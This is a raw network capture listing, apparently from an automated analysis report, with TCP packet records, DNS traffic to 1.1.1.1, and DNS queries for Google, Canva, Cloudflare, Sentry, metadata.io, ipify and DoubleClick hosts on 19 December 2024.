                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.045545101 CET49929443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.045886040 CET49929443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.045942068 CET4434992935.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.046037912 CET49929443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.049174070 CET4434993035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.049388885 CET49930443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.049422026 CET4434993035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.052823067 CET4434993035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.052903891 CET49930443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.053282976 CET49930443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.053363085 CET4434993035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.053390980 CET49930443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.087354898 CET4434992935.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.095330954 CET4434993035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.098086119 CET49929443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.098098040 CET4434992935.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.098284006 CET49930443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.098292112 CET4434993035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.144973040 CET49929443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.144972086 CET49930443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.372519970 CET4434992735.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.372606993 CET4434992735.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.372823000 CET49927443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.372860909 CET4434992735.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.372886896 CET49927443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.372919083 CET49927443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.374002934 CET49932443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.374094963 CET4434993235.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.374170065 CET49932443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.374433041 CET49932443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.374485016 CET4434993235.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.504832029 CET4434992935.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.504923105 CET4434992935.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.504981041 CET49929443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.505270958 CET49929443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.505270958 CET49929443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.505289078 CET4434992935.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.505371094 CET49929443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.505517960 CET49934443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.505547047 CET4434993435.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.506206036 CET49934443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.506377935 CET49934443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.506402969 CET4434993435.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.511687994 CET4434993035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.511904001 CET4434993035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.511951923 CET49930443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.512006044 CET49930443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.512021065 CET4434993035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.512036085 CET49930443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.512063980 CET49930443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.512360096 CET49935443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.512464046 CET4434993535.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.515027046 CET49935443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.515291929 CET49935443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:35.515343904 CET4434993535.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:36.584192038 CET4434993235.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:36.629388094 CET49932443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:36.716027975 CET4434993435.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:36.729337931 CET4434993535.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:36.769985914 CET49934443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:36.769992113 CET49935443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:11.990138054 CET53605361.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:12.195718050 CET53572621.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:15.097523928 CET53599061.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:15.692713976 CET5757453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:15.692831039 CET6432053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:15.830348969 CET53643201.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:15.833475113 CET53575741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.815644979 CET5057453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.815948963 CET5852653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.953663111 CET53505741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.954206944 CET53585261.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.895493031 CET5985853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.895900965 CET6549253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.033956051 CET53598581.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.033993006 CET53654921.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.146801949 CET6538553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.147099972 CET6192353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.316809893 CET53619231.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.318221092 CET53653851.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.831331015 CET4917353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.831762075 CET5287953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.968677044 CET53491731.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.969404936 CET53528791.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.218244076 CET5127653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.218389988 CET5937553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.355578899 CET53593751.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.355916977 CET53512761.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.376441956 CET5088153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.376646996 CET4933153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.513468981 CET53508811.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.517556906 CET53493311.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.193651915 CET6085553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.193809986 CET6076753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.331756115 CET53608551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.332179070 CET53607671.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.217809916 CET6203553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.218009949 CET5273453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.354806900 CET53527341.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.354827881 CET53620351.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.598787069 CET53495331.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.217859030 CET6339153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.217983961 CET5373853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.355679035 CET53537381.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.355920076 CET53633911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.927922010 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.253120899 CET53627851.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.367440939 CET53493301.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.451771021 CET6277853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.452054977 CET5315753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.673687935 CET53531571.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.680888891 CET53627781.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.680783987 CET5235153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.680934906 CET5270553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.817612886 CET53523511.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.818159103 CET53527051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.854515076 CET6261353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.854949951 CET6518553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.860032082 CET6059353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.860177040 CET5338553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.993067026 CET53626131.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.993104935 CET53651851.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.998440027 CET53605931.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.998888016 CET53533851.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:35.791491985 CET5500453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:35.791625977 CET5283453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:35.929169893 CET53550041.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:35.929699898 CET53528341.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.697289944 CET5998053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.697468996 CET6363653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.834188938 CET53599801.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.835081100 CET53636361.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.663099051 CET6190653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.663213015 CET5575653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.772048950 CET6491553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.772165060 CET5373253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.800302982 CET53557561.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.800342083 CET53619061.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.909039021 CET53537321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.909507990 CET53649151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.429783106 CET5785053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.429948092 CET6269053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.433943987 CET5440353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.434087038 CET6296353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.519213915 CET5267253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.519349098 CET6134153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.566735029 CET53578501.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.566996098 CET53626901.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.571073055 CET53544031.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.571103096 CET53629631.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.656476974 CET53526721.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.656569958 CET53613411.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:43.085773945 CET4997853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:43.085922003 CET6201653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:43.173336029 CET5168553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:43.173475027 CET5836753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:43.222732067 CET53620161.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:43.223334074 CET53499781.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:43.311136961 CET53583671.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:43.311695099 CET53516851.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:45.941687107 CET5968953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:45.941925049 CET5817453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:46.079941034 CET53581741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:46.081826925 CET53596891.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.579724073 CET6357353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.579941988 CET5262753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.580365896 CET5590453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.580496073 CET4982853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.632868052 CET6384953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.633117914 CET5049553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.718272924 CET53526271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.769773006 CET53504951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.769876003 CET53638491.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.826833010 CET53635731.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.938302994 CET53559041.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.938390970 CET53498281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.794694901 CET6007453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.794809103 CET6506453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.855607986 CET6039853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.855736971 CET5198853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.931996107 CET53600741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.932845116 CET53650641.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.993181944 CET53603981.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.993339062 CET53519881.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:50.381288052 CET5188053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:50.381400108 CET6202053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:50.840972900 CET53518801.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:50.844031096 CET53620201.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:51.076945066 CET53540191.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:52.999378920 CET5081753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:52.999664068 CET5898253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:53.136684895 CET53589821.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:53.140996933 CET53508171.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:55.427222967 CET5111553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:55.427383900 CET4957753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:55.564440012 CET53495771.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:55.564754963 CET53511151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:57.667608023 CET5705953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:57.667731047 CET5218653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:57.804826021 CET53570591.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:57.805315018 CET53521861.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:57.859817028 CET53557261.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:11.691126108 CET53575931.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:14.174695015 CET53591631.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:33.693994045 CET5978753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:33.694284916 CET5219553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:33.694744110 CET5656753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:33.694972038 CET6029453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:33.831582069 CET53521951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:33.832397938 CET53602941.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:33.832415104 CET53565671.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:33.834100962 CET53597871.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:15.692713976 CET192.168.2.41.1.1.10x7354Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:15.692831039 CET192.168.2.41.1.1.10x9df1Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.815644979 CET192.168.2.41.1.1.10x41a6Standard query (0)www.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.815948963 CET192.168.2.41.1.1.10x5007Standard query (0)www.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.895493031 CET192.168.2.41.1.1.10x9a5eStandard query (0)static.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.895900965 CET192.168.2.41.1.1.10x8ef2Standard query (0)static.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.146801949 CET192.168.2.41.1.1.10x725Standard query (0)static.cloudflareinsights.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.147099972 CET192.168.2.41.1.1.10xd42bStandard query (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.831331015 CET192.168.2.41.1.1.10x5000Standard query (0)static.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.831762075 CET192.168.2.41.1.1.10xed32Standard query (0)static.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.218244076 CET192.168.2.41.1.1.10xaea3Standard query (0)static.cloudflareinsights.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.218389988 CET192.168.2.41.1.1.10x2566Standard query (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.376441956 CET192.168.2.41.1.1.10xb1abStandard query (0)o13855.ingest.sentry.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.376646996 CET192.168.2.41.1.1.10x6618Standard query (0)o13855.ingest.sentry.io65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.193651915 CET192.168.2.41.1.1.10x61f3Standard query (0)o13855.ingest.sentry.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.193809986 CET192.168.2.41.1.1.10x17bfStandard query (0)o13855.ingest.sentry.io65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.217809916 CET192.168.2.41.1.1.10xab0bStandard query (0)font-public.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.218009949 CET192.168.2.41.1.1.10xad57Standard query (0)font-public.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.217859030 CET192.168.2.41.1.1.10x55a4Standard query (0)www.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.217983961 CET192.168.2.41.1.1.10x668dStandard query (0)www.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.451771021 CET192.168.2.41.1.1.10x7ed5Standard query (0)cdn.metadata.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.452054977 CET192.168.2.41.1.1.10x3adcStandard query (0)cdn.metadata.io65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.680783987 CET192.168.2.41.1.1.10xc622Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.680934906 CET192.168.2.41.1.1.10x16afStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.854515076 CET192.168.2.41.1.1.10x8115Standard query (0)cdn.metadata.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.854949951 CET192.168.2.41.1.1.10xcad3Standard query (0)cdn.metadata.io65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.860032082 CET192.168.2.41.1.1.10xca24Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.860177040 CET192.168.2.41.1.1.10x9460Standard query (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:35.791491985 CET192.168.2.41.1.1.10x1a84Standard query (0)ct.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:35.791625977 CET192.168.2.41.1.1.10xc55dStandard query (0)ct.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.697289944 CET192.168.2.41.1.1.10xd4a0Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.697468996 CET192.168.2.41.1.1.10xdf25Standard query (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.663099051 CET192.168.2.41.1.1.10xe2f9Standard query (0)ad.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.663213015 CET192.168.2.41.1.1.10xa11aStandard query (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.772048950 CET192.168.2.41.1.1.10x90a8Standard query (0)ct.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.772165060 CET192.168.2.41.1.1.10x254aStandard query (0)ct.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.429783106 CET192.168.2.41.1.1.10x3188Standard query (0)adservice.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.429948092 CET192.168.2.41.1.1.10xf3b8Standard query (0)adservice.google.com65IN (0x0001)false
